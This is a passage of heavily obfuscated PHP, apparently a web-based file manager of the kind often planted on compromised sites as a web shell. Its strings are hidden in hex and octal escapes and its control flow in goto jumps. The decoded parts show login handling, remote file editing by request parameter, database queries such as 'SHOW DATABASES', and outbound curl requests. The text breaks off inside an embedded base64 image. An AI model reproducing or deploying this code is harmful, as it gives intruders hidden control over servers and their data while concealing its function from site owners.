nIhje("\x41\144\x64") . "\42\40\76\x3c\57\x74\x64\76\x3c\x2f\x74\162\x3e\xd\12\74\57\x66\157\x72\x6d\76\15\xa\74\x2f\164\x61\x62\154\x65\x3e\xd\xa"; goto wFF7T; E9Nth: $vw1xF = json_decode(${$h17u3 . "\137\x74\x65\155\160\x6c\x61\164\x65\x73"}, true); goto xcB2X; wFF7T: } goto KVcJF; AAW6j: ini_set("\155\x65\x6d\x6f\x72\171\x5f\x6c\x69\x6d\x69\164", "\55\61"); goto lTKJw; Dcrc_: $TXcqo = $zBDAR . "\x26\x65\x64\151\164\75" . $_REQUEST["\x65\x64\151\164"] . "\x26\160\141\x74\x68\x3d" . $QxlDp; goto TDZZt; A2tq8: echo "\42\76\15\xa\x9\x9\x3c\151\x6e\160\165\164\40\x74\171\x70\145\75\42\x73\x75\x62\155\151\164\x22\x20\166\141\154\x75\x65\75\x22"; goto YWXgq; H1idj: echo "\x20\x3c\57\x74\x68\76\xd\12\x20\x20\x20\40\74\x74\x68\x20\x73\164\171\154\145\75\42\167\150\x69\164\145\x2d\163\x70\141\x63\145\x3a\x6e\157\167\x72\141\x70\42\x3e\40"; goto cQvSs; B2o5Y: $LUt9m = array("\145\x6e", "\x72\165", "\x64\145", "\x66\162", "\165\x6b"); goto cnsu3; yDx_9: if (isset($_GET["\x67\x7a\x66\x69\x6c\145"])) { goto VdZ70; } goto bXg53; EOQr3: if (empty($VHBqZ)) { goto N59wz; } goto qbQMT; MLceQ: TxKkw: goto dS8fi; bVlFw: XoZoo: goto Jjk7t; NR377: $EA6Qz = array(); goto UU3Yd; Mn_9t: echo $PhGcO; goto kzUQ4; AycMa: echo $zBDAR . "\46\160\141\x74\150\x3d" . $QxlDp; goto k0Rpy; OwgxT: echo NiHJE("\x51\165\x69\x74"); goto DeNA7; tztFQ: echo "\x20\x3c\x2f\164\x68\x3e\xd\12\74\57\x74\162\x3e\xd\xa\x3c\57\x74\x68\145\x61\x64\x3e\15\12\74\164\x62\157\144\171\x3e\15\xa"; goto C3FyW; J3tzZ: if (!($HKiyj && !empty($_SERVER["\110\124\124\x50\x5f\101\x43\103\x45\120\x54\x5f\114\101\x4e\107\125\x41\107\x45"]) && empty($_COOKIE["\146\155\x5f\x6c\141\x6e\x67"]))) { goto BAAAC; } goto Oi2nt; ip2Ab: die; goto Wqvcz; ZIrc3: curl_setopt($AU30p, CURLOPT_REFERER, $JD5XC); goto kJYUf; T9RUs: LLZuC: goto MuhsT; makPD: foreach ($VHBqZ as $FZWOs => $WEDKg) { $scYTs .= "\x3c\x6f\x70\x74\x69\x6f\156\x20\166\141\x6c\165\145\75\42" . $WEDKg . "\42\40" . (!empty($WEDKg) && $WEDKg == $mRqUG ? "\163\145\x6c\145\143\x74\x65\144" : '') . "\40\x3e" . niHJe($FZWOs) . "\x3c\x2f\x6f\160\164\x69\157\156\76\12"; GP08D: } goto YG6aU; hgJF3: echo $PhGcO; goto wfzoe; yd6kT: echo "\x9\74\57\164\x64\x3e\xd\12\x3c\x2f\164\x72\x3e\xd\xa\x3c\164\162\x3e\xd\12\40\40\40\x20\74\x74\x64\40\x63\154\141\163\163\75\42\162\x6f\x77\61\x22\x3e\xd\xa\x20\40\40\40\40\x20\40\x20"; goto fFE4J; riEDP: awr9d: goto AHHAx; m8Iii: curl_setopt($AU30p, CURLOPT_FOLLOWLOCATION, 1); goto ptRqd; xhlhm: $KVtmY = "\x7b\x22\101\x6c\x6c\40\x62\x61\163\x65\163\42\x3a\x22\x53\x48\x4f\x57\x20\104\101\124\101\102\x41\x53\x45\x53\x3b\42\54\x22\x41\154\154\40\164\x61\x62\154\x65\163\x22\72\42\x53\x48\x4f\127\40\124\101\x42\114\x45\123\73\x22\175"; goto dfhe2; xipPw: if (isset($_GET["\x66\x6d\137\x63\x6f\x6e\146\x69\147\137\144\x65\x6c\145\164\145"])) { goto J2qVF; } goto EgFRy; mL6e1: $PhGcO .= NihJE("\x46\x69\x6c\x65\40\165\160\144\x61\x74\x65\144"); goto dULO8; BWorC: echo "\x3c\57\x61\x3e\15\xa\x9\x3c\x2f\x74\144\x3e\15\12\x3c\x2f\164\x72\76\xd\12\x3c\x74\x72\76\xd\12\x20\x20\40\40\x3c\164\144\x20\143\154\x61\163\x73\x3d\42\162\157\167\x31\42\x20\141\x6c\151\147\x6e\75\x22\x63\x65\x6e\164\x65\x72\42\76\xd\xa\40\40\40\x20\x20\40\40\x20\x3c\x66\x6f\162\x6d\x20\x6e\141\155\x65\75\42\146\x6f\x72\x6d\x31\42\x20\155\x65\164\150\157\x64\x3d\42\x70\157\163\164\x22\x20\141\143\x74\151\157\x6e\75\42"; goto bvmno; cQvSs: echo niHjE("\x44\141\164\x65"); goto X9wqd; m_7By: rNQCG: goto UKFg4; bVpNa: $BXCqO = "\160\x68\x70"; goto UtDuE; c8gLp: if (isset($_POST["\146\155\x5f\x6c\157\x67\x69\x6e"])) { goto kU3wr; } goto NgXtp; Sweu1: goto uu4Dh; goto MO0Ds; Yp1MR: OaJuP: goto Y_fjj; rWfnB: echo "\x9\11\74\x2f\164\x64\76\xd\xa\x9\x9\74\164\x64\76\15\12\x9\x9"; goto oVvFG; ksoD3: goto nW1c4; goto vgo79; ZOSt1: r8k2s: goto NufMd; SkllR: echo "\74\x2f\x74\151\164\x6c\x65\x3e\xd\xa\74\x73\x74\x79\x6c\145\x3e\xd\12\142\157\x64\171\40\173\15\xa\11\142\x61\143\153\x67\162\x6f\165\156\144\x2d\143\x6f\154\157\x72\72\x9\167\150\151\164\145\73\xd\xa\11\x66\x6f\x6e\x74\x2d\146\141\155\x69\x6c\171\x3a\11\x9\x56\145\x72\x64\x61\x6e\x61\54\x20\101\x72\151\141\154\x2c\x20\110\x65\x6c\166\x65\164\x69\x63\141\x2c\40\163\x61\x6e\x73\x2d\163\x65\x72\x69\146\x3b\15\12\11\146\157\156\x74\x2d\x73\x69\x7a\145\72\11\11\11\70\x70\x74\x3b\15\12\x9\x6d\x61\x72\147\x69\x6e\72\x9\11\x9\x9\60\160\x78\x3b\15\xa\x7d\xd\12\xd\xa\x61\72\154\151\156\x6b\x2c\x20\141\72\x61\x63\164\151\x76\145\54\x20\141\x3a\x76\151\x73\x69\164\x65\x64\40\173\x20\143\157\x6c\x6f\x72\x3a\40\43\60\x30\x36\66\x39\71\x3b\x20\164\x65\170\x74\x2d\x64\x65\x63\x6f\162\x61\x74\x69\157\156\x3a\40\156\x6f\x6e\145\x3b\40\x7d\xd\12\141\x3a\x68\157\166\145\x72\x20\173\x20\143\157\x6c\x6f\162\x3a\x20\x23\x44\x44\66\x39\x30\x30\x3b\x20\164\145\170\164\x2d\x64\x65\x63\157\162\x61\164\151\157\x6e\72\40\165\156\x64\145\x72\154\x69\x6e\x65\73\40\175\xd\xa\141\x2e\164\150\x3a\x6c\151\156\153\x20\x7b\x20\143\157\154\157\x72\72\40\43\106\x46\x41\63\x34\x46\x3b\40\164\x65\170\164\x2d\x64\145\143\157\x72\141\164\x69\x6f\x6e\72\40\156\157\156\145\73\40\175\xd\xa\141\x2e\164\150\x3a\141\143\164\x69\166\x65\x20\173\x20\143\157\x6c\157\x72\x3a\40\x23\106\x46\101\63\64\106\x3b\x20\x74\145\x78\164\x2d\x64\x65\143\157\162\141\164\151\157\156\72\x20\156\157\x6e\145\x3b\x20\x7d\xd\xa\141\x2e\x74\150\x3a\166\151\163\151\x74\x65\x64\x20\x7b\x20\x63\157\x6c\x6f\x72\x3a\x20\43\x46\106\x41\63\64\x46\x3b\x20\164\145\170\164\x2d\144\x65\x63\157\162\x61\x74\x69\x6f\x6e\72\x20\x6e\x6f\156\145\x3b\40\x7d\15\xa\x61\x2e\164\150\x3a\x68\157\166\x65\x72\x20\x7b\40\x20\143\x6f\x6c\157\x72\x3a\40\x23\x46\106\x41\63\x34\106\x3b\40\164\145\170\x74\x2d\144\145\143\x6f\x72\141\x74\x69\157\156\72\x20\x75\156\144\x65\x72\154\x69\x6e\x65\x3b\x20\x7d\15\12\xd\12\164\141\142\154\145\56\x62\x67\40\173\15\12\x9\142\x61\143\x6b\147\162\157\x75\156\x64\x2d\143\x6f\154\x6f\x72\72\x20\43\101\103\102\102\x43\66\xd\xa\175\xd\12\xd\12\164\150\54\x20\x74\144\40\x7b\x20\15\xa\x9\x66\x6f\156\164\72\x9\156\x6f\x72\155\141\x6c\40\70\160\164\x20\126\145\x72\144\x61\x6e\141\54\40\x41\x72\151\141\x6c\x2c\40\x48\145\154\166\145\164\x69\143\x61\x2c\40\163\x61\x6e\163\55\x73\x65\x72\151\x66\x3b\xd\xa\x9\x70\x61\144\144\151\x6e\x67\x3a\40\63\x70\x78\73\15\xa\x7d\xd\xa\xd\12\164\150\11\173\15\12\x9\150\145\x69\x67\x68\x74\x3a\x9\11\x9\11\x32\x35\160\170\73\15\xa\x9\142\141\143\x6b\x67\x72\x6f\x75\x6e\x64\55\143\157\x6c\x6f\162\x3a\11\x23\x30\x30\66\66\x39\x39\73\15\12\x9\143\x6f\154\157\162\x3a\11\x9\x9\11\43\x46\106\101\63\x34\x46\x3b\xd\xa\x9\146\157\x6e\x74\x2d\x77\145\151\x67\150\x74\72\x9\11\x62\x6f\x6c\144\x3b\15\xa\x9\x66\x6f\156\x74\x2d\x73\151\172\x65\x3a\x9\11\x9\x31\61\x70\170\x3b\15\xa\175\xd\12\15\12\x2e\162\157\x77\x31\40\x7b\15\12\11\x62\x61\x63\153\x67\x72\x6f\165\156\x64\x2d\143\157\154\x6f\162\x3a\11\x23\x45\x46\105\x46\105\x46\73\xd\xa\175\xd\12\xd\xa\x2e\x72\x6f\167\62\40\173\xd\12\11\142\x61\x63\x6b\x67\162\x6f\x75\x6e\x64\x2d\143\157\154\x6f\x72\72\11\43\104\105\105\63\105\67\x3b\xd\12\175\xd\12\15\xa\56\162\157\x77\63\40\173\xd\12\x9\x62\141\143\153\x67\162\x6f\x75\156\x64\55\143\x6f\x6c\x6f\x72\72\11\43\104\61\x44\67\104\x43\x3b\xd\12\x9\x70\x61\144\x64\151\156\147\72\x20\x35\160\170\x3b\15\12\x7d\xd\12\xd\12\164\162\56\x72\157\167\x31\x3a\150\157\x76\145\x72\x20\173\xd\xa\x9\x62\x61\x63\153\147\162\x6f\165\x6e\x64\x2d\x63\x6f\x6c\x6f\162\72\x9\x23\106\63\106\x43\x46\x43\73\xd\12\x7d\xd\xa\15\xa\164\x72\56\x72\157\x77\62\x3a\x68\157\166\145\162\x20\173\xd\12\11\x62\141\x63\153\x67\162\x6f\165\x6e\x64\55\x63\157\154\157\162\x3a\x9\43\x46\x30\x46\x36\106\x36\x3b\15\xa\175\15\12\15\12\x2e\167\150\x6f\x6c\145\40\x7b\xd\xa\11\x77\151\144\x74\x68\72\x20\x31\60\x30\x25\73\15\xa\175\15\12\xd\xa\x2e\141\154\154\40\164\142\157\x64\x79\40\164\x64\x3a\146\x69\162\x73\164\55\143\x68\x69\x6c\x64\173\x77\151\144\x74\x68\72\61\60\x30\45\x3b\175\xd\xa\xd\12\x74\145\x78\164\x61\162\x65\141\40\173\15\12\11\146\x6f\156\x74\72\x20\71\160\x74\x20\x27\x43\157\x75\162\x69\145\x72\x20\116\145\167\47\x2c\40\x63\x6f\165\162\x69\x65\162\73\15\12\x9\154\151\x6e\x65\55\150\145\151\147\x68\x74\x3a\x20\61\x32\65\45\x3b\xd\xa\x9\x70\141\x64\x64\x69\156\x67\72\40\x35\x70\x78\73\15\xa\175\xd\12\xd\12\x2e\164\145\170\164\141\x72\145\x61\137\x69\x6e\160\165\x74\40\173\xd\xa\x9\x68\145\151\147\x68\164\72\40\x31\145\x6d\x3b\xd\xa\175\xd\12\15\xa\x2e\x74\x65\x78\164\141\162\x65\141\137\151\156\x70\x75\164\72\146\x6f\143\165\163\x20\173\15\12\x9\150\x65\x69\147\150\164\x3a\40\141\x75\164\157\x3b\xd\12\175\15\xa\xd\xa\x69\x6e\160\165\x74\x5b\164\171\160\x65\x3d\x73\x75\x62\155\151\x74\135\x7b\15\xa\x9\142\x61\143\153\x67\162\157\x75\156\x64\72\40\x23\x46\103\x46\103\106\103\40\x6e\x6f\x6e\x65\x20\41\x69\155\160\157\x72\x74\x61\156\x74\x3b\15\xa\x9\143\x75\162\163\157\x72\72\40\160\x6f\x69\156\164\145\162\73\xd\12\x7d\15\xa\xd\xa\x2e\x66\157\154\x64\145\x72\40\173\15\xa\x20\40\x20\x20\142\141\x63\x6b\147\x72\157\165\156\x64\x2d\151\155\x61\147\x65\x3a\40\x75\162\x6c\x28\x22\144\x61\x74\141\x3a\x69\x6d\141\x67\145\57\x70\156\x67\x3b\142\x61\163\x65\66\x34\x2c\x69\126\102\x4f\122\x77\60\x4b\x47\x67\157\x41\101\x41\x41\116\x53\x55\x68\105\x55\x67\x41\101\x41\102\x41\x41\x41\x41\x41\121\x43\x41\x59\101\x41\101\101\x66\70\57\71\x68\x41\101\x41\x4b\x54\62\x6c\104\x51\x31\x42\121\x61\x47\x39\x30\x62\x33\116\x6f\x62\63\x41\x67\x53\x55\x4e\x44\x49\x48\x42\171\x62\62\x5a\160\142\107\x55\101\x41\x48\x6a\x61\156\x56\116\x6e\126\x46\120\x70\106\152\x33\x33\63\166\122\103\x53\64\151\x41\154\105\x74\x76\x55\x68\125\111\111\x46\x4a\103\x69\x34\101\125\153\x53\x59\161\x49\121\153\121\x53\x6f\147\x68\157\x64\153\x56\125\143\105\x52\x52\125\x55\x45\x47\70\151\147\151\101\117\x4f\152\157\103\x4d\106\126\105\x73\x44\111\x6f\113\x32\101\146\x6b\x49\141\x4b\x4f\x67\x36\x4f\x49\x69\x73\x72\x37\x34\x58\x75\152\141\x39\x61\x38\71\53\x62\x4e\57\162\130\x58\x50\165\145\163\70\65\x32\172\172\x77\146\x41\x43\x41\x79\127\123\x44\x4e\x52\116\131\x41\115\x71\x55\111\145\105\x65\x43\x44\x78\70\x54\x47\x34\x65\x51\165\x51\x49\x45\x4b\112\x48\x41\x41\x45\101\151\172\x5a\x43\106\x7a\x2f\x53\x4d\x42\x41\x50\x68\x2b\x50\x44\167\x72\111\163\x41\110\166\x67\101\x42\x65\x4e\x4d\114\x43\x41\104\101\x54\132\x76\101\x4d\x42\x79\x48\57\167\57\x71\121\x70\154\143\101\x59\103\x45\101\x63\x42\x30\153\124\150\114\103\x49\101\x55\x41\x45\102\x36\152\153\113\x6d\x41\105\102\107\x41\131\x43\x64\155\103\x5a\x54\101\113\101\105\x41\x47\104\x4c\131\x32\x4c\152\x41\106\101\164\101\107\101\x6e\146\x2b\142\x54\101\x49\x43\144\53\x4a\154\x37\101\x51\x42\x62\x6c\103\x45\126\x41\141\103\x52\x41\103\101\124\132\131\x68\105\101\x47\x67\67\x41\113\172\x50\126\x6f\160\106\x41\106\x67\x77\x41\x42\x52\x6d\x53\70\x51\x35\101\x4e\x67\164\101\x44\102\112\x56\62\132\x49\101\x4c\103\x33\101\x4d\x44\x4f\105\101\x75\171\x41\101\x67\x4d\x41\104\x42\x52\x69\x49\x55\x70\x41\101\122\67\101\107\104\x49\x49\x79\116\64\101\111\x53\x5a\101\102\122\x47\70\154\143\70\x38\123\x75\165\x45\117\143\x71\101\101\x42\64\155\x62\111\x38\x75\x53\121\x35\x52\131\x46\x62\103\x43\x31\170\x42\61\x64\130\x4c\150\64\157\172\x6b\153\130\113\170\121\x32\131\x51\x4a\x68\x6d\153\101\x75\167\156\x6d\132\x47\x54\113\102\x4e\x41\57\x67\70\x38\x77\101\x41\x4b\x43\122\x46\x52\110\147\147\57\x50\71\145\x4d\64\x4f\162\x73\x37\x4f\x4e\x6f\66\x32\x44\x6c\x38\164\x36\162\70\107\57\171\112\x69\x59\x75\x50\x2b\65\x63\x2b\162\x63\x45\101\x41\x41\117\106\60\x66\x74\110\x2b\x4c\x43\x2b\x7a\x47\x6f\x41\67\102\x6f\x42\x74\x2f\x71\x49\x6c\67\x67\122\x6f\130\147\165\147\144\146\145\x4c\132\x72\111\120\x51\114\x55\101\157\117\x6e\x61\x56\57\x4e\x77\53\x48\64\70\120\105\x57\x68\153\x4c\x6e\132\62\145\x58\153\x35\116\150\113\170\105\x4a\142\x59\143\x70\x58\146\146\65\x6e\x77\x6c\x2f\101\126\x2f\x31\163\53\x58\64\70\57\x50\x66\x31\64\x4c\x37\x69\112\x49\x45\171\130\131\x46\x48\x42\x50\x6a\147\167\163\172\60\124\113\x55\x63\172\x35\x49\x4a\x68\x47\x4c\143\x35\x6f\71\110\x2f\114\143\x4c\57\x2f\x77\144\60\x79\x4c\x45\x53\127\x4b\x35\127\103\157\125\64\61\105\x53\143\131\65\105\x6d\157\x7a\172\115\161\125\x69\151\x55\113\x53\x4b\x63\x55\154\60\166\71\153\64\x74\70\163\53\x77\115\53\63\x7a\x55\101\163\107\x6f\53\101\130\x75\x52\x4c\x61\x68\x64\131\167\x50\62\123\171\143\121\x57\x48\x54\x41\64\x76\x63\101\101\x50\113\67\x62\70\110\x55\113\x41\x67\x44\147\x47\x69\x44\x34\x63\x39\x33\x2f\53\70\57\x2f\125\x65\147\112\x51\103\x41\x5a\153\155\123\x63\x51\x41\x41\130\153\121\153\114\154\x54\113\163\172\x2f\x48\x43\x41\x41\101\122\x4b\x43\102\x4b\162\102\x42\107\x2f\124\102\107\103\172\x41\x42\x68\172\102\102\x64\172\102\103\57\x78\147\116\157\x52\x43\112\115\124\x43\121\150\102\x43\103\155\123\101\110\x48\x4a\147\x4b\x61\171\x43\x51\x69\x69\x47\x7a\142\101\x64\113\155\101\x76\x31\105\x41\144\x4e\115\102\x52\x61\x49\x61\124\143\x41\64\165\167\154\x57\64\104\x6a\x31\x77\104\57\160\150\x43\112\67\102\113\x4c\x79\x42\103\121\x52\x42\x79\101\147\124\x59\123\x48\x61\151\101\106\151\x69\x6c\x67\152\152\x67\147\130\155\x59\x58\64\111\143\x46\111\x42\102\113\x4c\x4a\x43\x44\x4a\x69\102\x52\x52\111\153\165\122\116\x55\147\170\125\x6f\x70\125\x49\106\x56\x49\x48\x66\x49\x39\x63\147\111\x35\x68\61\170\107\x75\160\105\x37\171\x41\101\171\x67\166\x79\x47\166\x45\x63\x78\x6c\x49\x47\x79\125\124\x33\x55\104\x4c\x56\x44\x75\141\147\x33\x47\157\122\x47\x6f\x67\x76\x51\132\x48\x51\x78\155\x6f\x38\x57\x6f\112\x76\121\x63\162\x51\141\x50\x59\167\x32\x6f\145\x66\121\x71\x32\147\120\62\157\70\53\121\70\143\167\167\x4f\x67\131\102\x7a\120\x45\142\x44\101\165\x78\x73\x4e\103\x73\x54\x67\x73\x43\x5a\x4e\152\x79\67\x45\x69\x72\x41\171\x72\x78\x68\x71\167\126\x71\x77\x44\x75\x34\156\x31\131\x38\x2b\170\144\167\x51\x53\x67\125\130\x41\103\x54\x59\105\144\60\x49\x67\131\x52\x35\x42\123\106\x68\115\x57\105\x37\x59\x53\113\x67\147\x48\x43\x51\60\x45\x64\157\112\116\x77\x6b\104\x68\106\110\x43\112\x79\113\x54\161\105\x75\60\x4a\162\157\x52\x2b\143\x51\131\131\x6a\111\170\150\61\x68\x49\114\x43\120\x57\105\x6f\70\x54\x4c\x78\102\x37\151\x45\120\105\x4e\171\x51\x53\x69\x55\115\x79\x4a\67\x6d\x51\101\153\x6d\170\160\106\124\123\105\164\x4a\x47\x30\155\x35\123\x49\53\x6b\163\161\132\x73\60\123\102\x6f\152\x6b\70\156\141\132\x47\x75\171\x42\x7a\155\125\x4c\103\101\x72\x79\111\130\x6b\x6e\145\x54\x44\65\104\120\153\107\53\121\x68\x38\x6c\x73\x4b\156\127\112\x41\143\x61\124\64\125\x2b\111\157\x55\x73\x70\x71\123\x68\156\x6c\105\117\x55\60\65\x51\x5a\x6c\155\x44\112\102\x56\x61\x4f\x61\125\x74\x32\157\x6f\x56\x51\122\116\131\x39\x61\x51\161\x32\150\164\x6c\113\x76\125\131\x65\x6f\105\x7a\122\x31\155\x6a\x6e\x4e\x67\170\132\x4a\x53\x36\127\164\157\x70\130\124\107\x6d\x67\x58\141\x50\144\160\162\53\x68\x30\165\x68\110\144\154\x52\65\117\154\x39\102\130\x30\x73\x76\x70\122\53\x69\x58\66\101\x50\60\144\x77\x77\x4e\150\150\x57\x44\x78\x34\150\x6e\x4b\102\x6d\142\107\x41\143\x59\132\170\154\x33\x47\113\x2b\131\124\113\131\x5a\60\64\x73\132\x78\x31\x51\167\116\x7a\x48\x72\155\x4f\x65\x5a\x44\65\x6c\x76\126\x56\x67\x71\x74\x69\x70\x38\106\x5a\110\x4b\x43\x70\126\x4b\x6c\123\x61\126\x47\171\x6f\166\126\113\155\x71\160\161\162\145\161\x67\164\x56\x38\x31\x58\114\126\111\x2b\160\130\154\116\x39\x72\x6b\x5a\x56\x4d\x31\x50\152\x71\121\x6e\125\x6c\x71\164\x56\x71\x70\x31\x51\x36\61\x4d\142\125\x32\x65\160\117\x36\151\110\161\155\145\x6f\x62\x31\121\x2f\160\110\x35\x5a\x2f\x59\x6b\107\x57\x63\x4e\x4d\167\x30\x39\x44\x70\x46\x47\147\163\x56\57\152\x76\115\x59\x67\103\62\x4d\x5a\x73\x33\x67\x73\x49\x57\x73\x4e\161\64\x5a\61\147\124\130\105\x4a\x72\110\116\x32\x58\170\x32\x4b\x72\x75\x59\57\122\x32\x37\151\172\x32\x71\161\x61\x45\65\x51\172\x4e\x4b\115\x31\145\x7a\125\166\x4f\125\x5a\x6a\70\x48\x34\x35\x68\x78\x2b\x4a\x78\x30\124\147\x6e\156\x4b\x4b\x65\x58\x38\63\66\x4b\x33\150\124\166\113\145\111\160\107\66\x59\60\x54\114\153\x78\x5a\126\x78\162\x71\160\141\x58\x6c\154\151\162\x53\x4b\x74\x52\161\60\x66\x72\x76\x54\x61\165\x37\x61\145\x64\x70\x72\x31\106\x75\x31\156\67\147\121\x35\x42\170\60\157\x6e\130\x43\144\x48\132\x34\x2f\117\x42\132\x33\156\125\x39\154\124\x33\141\x63\113\x70\x78\x5a\116\x50\x54\162\x31\162\x69\x36\161\141\66\125\142\x6f\x62\164\x45\144\x37\71\165\x70\x2b\66\131\156\x72\65\145\x67\x4a\x35\115\x62\x36\x66\x65\145\x62\63\x6e\53\150\170\71\114\57\61\125\57\127\x33\x36\x70\x2f\126\x48\x44\106\147\107\163\167\167\153\x42\x74\x73\115\172\150\147\70\170\124\126\x78\142\172\167\144\114\70\146\x62\x38\x56\106\x44\x58\143\x4e\x41\x51\x36\x56\150\154\x57\107\130\x34\131\123\x52\165\x64\x45\x38\157\x39\126\107\152\x55\x59\120\x6a\x47\x6e\x47\130\117\x4d\153\x34\62\x33\107\x62\x63\141\152\112\147\x59\155\x49\x53\x5a\114\x54\145\160\116\x37\160\160\123\x54\x62\155\155\x4b\141\131\67\x54\x44\x74\x4d\x78\x38\x33\115\x7a\x61\x4c\x4e\61\x70\153\61\x6d\172\x30\170\61\172\114\156\x6d\x2b\x65\x62\61\65\166\146\164\62\x42\x61\x65\x46\157\163\x74\x71\x69\62\x75\x47\126\112\x73\x75\122\x61\x70\x6c\156\x75\x74\x72\x78\165\150\x56\x6f\x35\127\x61\x56\x59\126\x56\x70\144\x73\60\141\164\156\x61\60\x6c\61\162\165\164\165\66\143\122\160\x37\154\x4f\x6b\60\66\162\156\164\x5a\x6e\167\x37\104\x78\x74\x73\155\x32\x71\x62\143\x5a\x73\x4f\x58\x59\x42\x74\x75\165\x74\155\x32\62\146\x57\106\156\x59\150\144\156\x74\x38\127\x75\167\x2b\x36\124\x76\x5a\x4e\x39\x75\x6e\x32\x4e\x2f\x54\x30\x48\104\x59\x66\x5a\x44\x71\163\144\127\x68\x31\53\x63\x37\122\171\106\104\160\127\x4f\x74\x36\141\x7a\x70\172\x75\x50\x33\x33\x46\71\112\x62\x70\x4c\62\144\x59\172\x78\x44\120\62\104\120\x6a\164\150\x50\114\113\x63\x52\x70\156\126\117\x62\60\x30\x64\156\106\x32\x65\x35\x63\64\120\x7a\151\x49\165\112\x53\x34\114\114\x4c\160\x63\x2b\114\160\x73\x62\170\x74\63\111\166\145\122\113\144\x50\126\x78\x58\x65\x46\x36\60\166\127\144\155\67\117\x62\167\165\62\157\62\66\57\165\x4e\165\x35\x70\x37\157\146\x63\156\x38\x77\60\x6e\171\155\x65\127\124\116\x7a\60\115\x50\x49\x51\53\102\122\x35\x64\105\x2f\x43\65\x2b\126\x4d\x47\x76\146\162\x48\x35\x50\121\60\53\x42\x5a\x37\130\x6e\x49\171\x39\152\114\65\106\x58\162\144\145\x77\x74\66\x56\x33\x71\x76\x64\x68\67\170\x63\53\x39\x6a\65\x79\x6e\x2b\x4d\x2b\64\172\167\63\63\152\x4c\145\127\x56\57\115\116\x38\103\x33\x79\x4c\x66\114\124\70\116\x76\x6e\x6c\x2b\106\x33\60\x4e\57\x49\57\x39\153\x2f\x33\162\x2f\x30\121\x43\x6e\x67\103\x55\x42\x5a\167\x4f\112\147\x55\107\x42\x57\167\x4c\67\53\110\x70\70\111\x62\53\x4f\x50\172\x72\x62\x5a\x66\x61\x79\x32\145\61\x42\152\113\103\x35\121\x52\126\x42\x6a\64\x4b\164\147\x75\x58\102\x72\x53\106\x6f\x79\x4f\x79\121\162\x53\x48\63\x35\65\x6a\x4f\153\143\x35\160\x44\x6f\126\121\x66\x75\152\x57\60\x41\144\150\x35\x6d\x47\x4c\167\63\x34\x4d\112\x34\127\110\150\126\x65\x47\x50\64\65\x77\x69\106\147\x61\60\x54\x47\130\x4e\130\x66\x52\x33\x45\116\x7a\63\x30\x54\x36\122\112\x5a\105\63\x70\x74\x6e\x4d\125\x38\65\162\x79\x31\113\x4e\123\157\53\161\x69\x35\x71\120\116\x6f\63\x75\152\x53\66\120\x38\x59\x75\132\x6c\x6e\x4d\61\126\x69\x64\x57\x45\154\163\123\x78\x77\65\114\151\161\x75\116\155\x35\163\x76\x74\x2f\x38\x37\x66\x4f\110\x34\x70\63\151\x43\53\116\67\x46\x35\147\166\x79\x46\61\x77\145\141\110\x4f\167\x76\x53\106\x70\x78\x61\160\114\150\x49\x73\117\160\132\x41\x54\111\150\117\x4f\x4a\x54\167\x51\x52\101\x71\x71\x42\141\x4d\112\x66\x49\x54\x64\x79\x57\x4f\103\156\156\103\110\143\x4a\156\x49\x69\x2f\x52\116\x74\107\x49\x32\x45\116\143\x4b\150\x35\117\x38\x6b\147\161\124\130\161\x53\x37\x4a\107\x38\116\x58\153\x6b\x78\124\117\x6c\114\x4f\x57\65\150\x43\x65\x70\x6b\114\170\115\104\x55\172\x64\x6d\172\x71\145\x46\x70\x70\x32\111\107\x30\x79\x50\x54\x71\71\115\x59\x4f\x53\x6b\x5a\102\170\x51\161\x6f\150\124\x5a\x4f\62\132\53\x70\x6e\65\155\x5a\x32\x79\x36\x78\154\150\x62\114\53\x78\x57\x36\x4c\164\171\x38\x65\x6c\121\x66\x4a\x61\x37\117\x51\x72\101\x56\x5a\x4c\x51\161\x32\121\161\142\157\126\106\x6f\x6f\61\171\x6f\x48\x73\155\x64\154\126\62\x61\57\x7a\131\156\x4b\x4f\x5a\x61\162\156\x69\166\x4e\x37\x63\x79\172\171\x74\165\x51\116\65\172\x76\156\57\x2f\164\x45\163\111\123\64\x5a\113\62\x70\131\132\x4c\x56\171\60\144\x57\117\x61\71\x72\107\157\x35\x73\x6a\170\x78\x65\x64\163\x4b\64\x78\x55\x46\x4b\64\x5a\127\102\161\x77\70\165\111\x71\x32\113\155\63\x56\124\66\166\164\126\65\145\165\x66\162\x30\155\145\x6b\61\162\147\126\x37\x42\x79\157\114\102\x74\x51\x46\162\x36\x77\164\126\x43\165\x57\x46\146\145\166\143\x31\53\61\144\x54\61\x67\166\x57\x64\x2b\61\131\x66\161\107\156\122\x73\x2b\106\131\x6d\113\162\150\x54\x62\x46\65\143\126\x66\71\147\x6f\x33\110\152\x6c\107\x34\x64\x76\171\x72\53\132\63\x4a\123\x30\x71\x61\x76\105\165\x57\124\x50\132\164\x4a\155\66\x65\x62\145\114\x5a\65\x62\104\x70\141\161\x6c\53\x61\x58\x44\155\x34\116\x32\144\161\x30\x44\x64\71\x57\x74\117\x33\x31\x39\x6b\130\x62\x4c\65\x66\116\x4b\x4e\165\67\x67\67\x5a\x44\x75\141\x4f\57\x50\114\x69\x38\x5a\x61\146\112\x7a\163\x30\x37\x50\61\x53\153\126\x50\x52\125\x2b\154\x51\x32\x37\164\x4c\x64\x74\127\110\x58\53\107\67\x52\x37\150\164\67\x76\120\x59\60\67\x4e\130\142\x57\67\x7a\x33\57\x54\x37\112\166\x74\x74\x56\101\126\126\x4e\61\x57\142\126\x5a\146\164\x4a\x2b\67\x50\63\x50\66\66\x4a\161\x75\x6e\64\154\x76\164\164\130\x61\x31\x4f\x62\x58\x48\x74\170\x77\120\x53\x41\x2f\x30\x48\111\167\x36\62\61\67\156\x55\x31\x52\63\x53\x50\x56\122\x53\152\x39\x59\162\66\60\143\x4f\170\x78\53\x2b\x2f\x70\63\x76\x64\171\60\x4e\116\x67\61\x56\152\132\x7a\x47\64\x69\116\167\x52\x48\156\153\x36\x66\x63\x4a\63\x2f\143\x65\x44\x54\x72\x61\x64\157\170\67\x72\117\x45\x48\60\170\71\x32\110\127\x63\x64\114\x32\x70\x43\155\166\x4b\x61\x52\x70\164\124\155\166\x74\142\131\154\x75\x36\x54\70\167\53\x30\x64\x62\161\63\x6e\x72\70\122\71\x73\146\104\x35\x77\x30\x50\106\154\65\x53\x76\116\x55\171\127\156\141\x36\131\x4c\x54\153\62\x66\171\x7a\64\171\x64\x6c\x5a\61\71\x66\151\x37\65\x33\x47\104\142\x6f\x72\132\x37\x35\x32\120\x4f\63\62\157\120\x62\x2b\x2b\66\105\110\x54\150\x30\x6b\130\57\151\53\143\x37\166\x44\